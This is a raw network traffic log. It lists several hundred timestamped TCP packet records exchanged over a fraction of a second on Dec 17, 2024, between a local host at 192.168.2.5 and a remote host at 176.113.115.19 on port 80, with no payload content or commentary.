                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.423204899 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.425606966 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.425683022 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.425698042 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.425734997 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.428750038 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.428761959 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.428946972 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.431519985 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.431534052 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.431597948 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.434442043 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.434453964 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.434493065 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.437597036 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.437612057 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.437659979 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.440502882 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.440515995 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.440556049 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.443110943 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.443140984 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.443162918 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.443183899 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.446094036 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.446109056 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.446151972 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.448940992 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.449006081 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.449300051 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.449368954 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.451742887 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.451803923 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.451865911 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.451913118 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.454976082 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.454988956 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.455032110 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.457802057 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.457813978 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.457860947 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.460064888 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.460117102 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.460180044 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.460223913 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.462795019 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.462863922 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.463094950 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.463165998 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.465476990 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.465540886 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.466284037 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.466336012 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.468655109 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.468672991 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.468707085 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.468719959 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.470803022 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.470877886 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.471364021 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.471436977 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.473467112 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.473522902 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.473592997 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.473642111 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.476326942 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.476342916 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.476411104 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.479017019 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.479032040 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.479132891 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.482084990 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.482099056 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.482170105 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.484277010 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.484323025 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.484420061 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.484455109 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.487135887 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.487148046 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.487189054 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.489600897 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.489645958 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.489681959 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.489716053 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.492299080 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.492311954 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.492399931 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.495304108 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.495322943 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.495368004 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.495392084 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.498117924 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.498140097 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.498178005 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.498193026 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.500689983 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.500704050 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.500739098 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.503288984 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.503303051 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.503336906 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.503351927 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.506072998 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.506086111 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.506136894 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.508632898 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.508646011 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.508696079 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.511358976 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.511373997 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.511456966 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.513875961 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.513890028 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.513942957 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.607667923 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.607748032 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.607752085 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.607789993 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.608720064 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.608767986 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.608874083 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.608917952 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.610985041 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.611027002 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.611094952 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.611140013 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.613714933 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.613727093 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.613775969 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.615462065 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.615504980 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.615573883 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.615617037 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.617688894 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.617747068 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.617788076 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.617831945 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.619820118 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.619884968 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.620049953 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.620098114 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.622011900 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.622061014 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.622096062 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.622170925 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.624069929 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.624120951 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.624157906 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.624203920 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.626476049 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.626527071 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.626601934 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.626645088 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.628226995 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.628273010 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.628325939 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.628366947 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.630162001 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.630211115 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.630280972 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.630323887 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.632184982 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.632232904 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.632316113 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.632369041 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.634134054 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.634181976 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.634251118 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.634293079 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.636113882 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.636163950 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.636231899 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.636297941 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.637976885 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.638030052 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.638065100 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.638102055 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.639882088 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.639952898 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.640008926 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.640048027 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.641794920 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.641843081 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.641913891 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.641953945 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.643651009 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.643701077 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.643737078 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.643775940 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.645549059 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.645598888 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.645664930 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.645709038 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.647430897 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.647486925 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.647603989 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.647646904 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.649332047 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.649382114 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.649447918 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.649488926 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.651251078 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.651300907 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.651340008 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.651386023 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.653090000 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.653141975 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.653199911 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.653242111 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.654992104 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.655054092 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.655085087 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.655122042 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.656884909 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.656946898 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.656990051 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.657030106 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.658796072 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.658848047 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.658886909 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.658926010 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.660651922 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.660721064 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.660742998 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.660775900 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.662523031 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.662570000 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.662623882 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.662663937 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.664450884 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.664505959 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.664608955 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.664650917 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.666336060 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.666402102 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.666435003 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.666471958 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.668229103 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.668287992 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.668292999 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.668328047 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.670192003 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.670258999 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.670300007 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.670340061 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.672039986 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.672095060 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.672421932 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.672468901 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.673871040 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.673927069 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.673938036 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.673974991 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.675740004 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.675796986 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.675843000 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.675884008 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.677658081 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.677712917 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.677753925 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.677791119 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.679490089 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.679568052 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.679605007 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.679640055 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.681416988 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.681473017 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.681490898 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.681526899 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.683324099 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.683381081 CET4970580192.168.2.5176.113.115.19
